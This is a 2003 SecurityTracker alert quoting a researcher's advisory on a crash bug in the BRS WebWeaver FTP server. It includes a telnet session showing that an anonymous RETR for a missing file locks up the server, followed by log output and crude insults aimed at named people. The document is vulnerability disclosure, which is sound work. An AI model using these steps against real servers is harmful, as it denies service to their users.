BRS WebWeaver Can Be Crashed By Remote Authenticated Users Via the RETR Command
|
|
SecurityTracker Alert ID: 1006652 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Apr 28 2003
|
Impact: Denial of service via network
|
Advisory: Freedom 0f Knowledge Project
|
Version(s): 1.04 and prior versions
|
Description: A vulnerability was reported in BRS WebWeaver. A remote authenticated user, including an anonymous user, can cause the FTP server to crash.
F0KP reported that a remote authenticated user can issue a RETR command for a non-existent file to cause the FTP service to lock up.
|
Impact: A remote authenticated user can cause the FTP service to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.brswebweaver.com/ (Links to External Site)
|
Cause: Exception handling error
|
Underlying OS: Windows (Any)
|
Reported By: "euronymous" <just-a-user@yandex.ru>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 23 Apr 2003 22:47:43 +0400 (MSD)
From: "euronymous" <just-a-user@yandex.ru>
Subject: BRS WebWeaver: Ftpd Lockdown via RETR cmd
|
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: Ftpd Lockdown via RETR cmd
product: BRS WebWeaver 1.04 and prior
vendor: http://www.brswebweaver.com
risk: high
date: 04/23/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/021.en.txt
http://f0kp.iplus.ru/bz/021.ru.txt
contact email: euronymous@iplus.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
BRS WebWeaver have a dumb bug when trying to access
object, that not existent, with RETR command. Normal
behavior of ftp server will be print error message,
but webweaver just locks himself.
}-------- sample session -----------{
e@some_box$ telnet hostname 21
220 BRS WebWeaver FTP Server ready.
USER anonymous
331 Password required for anonymous.
PASS user@host
230 User anonymous logged in.
RETR blah
150 Opening data connection for blah.
}-------- sample session -----------{
Then i just close telnet session with webweaver and
try to connect server with ftp program.
}-------- sample session -----------{
e@some_box$ ftp hostname
Connection with hostname
}-------- sample session -----------{
That's all. Server is locked. No one can login in ftp
server. If i try to restart ftp server, then in my
log file will appear following:
}---------- from ftp.log -----------{
21/Apr/2003:17:30:27 - 195.**.***.** - User: anonymous - Disconnected
FTP Server Stopped
21/Apr/2003:17:30:38 - ERROR: FTP Server Fail to Start
21/Apr/2003:17:30:38 - Error 10022 in function WSAASyncSelect
Invalid argument
}---------- from ftp.log -----------{
Therefore, to restart ftp server u must close webweaver (with http
server) and run it again.
shouts: DWC, DHG, HUNGOSH, security.nnov.ru, Black Tigerz Research Group,
The N0b0D1eS, all russian security guyz!! to kate especially ))
f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb
f*cking team
================
im not a lame,
not yet a hacker
================
|
|
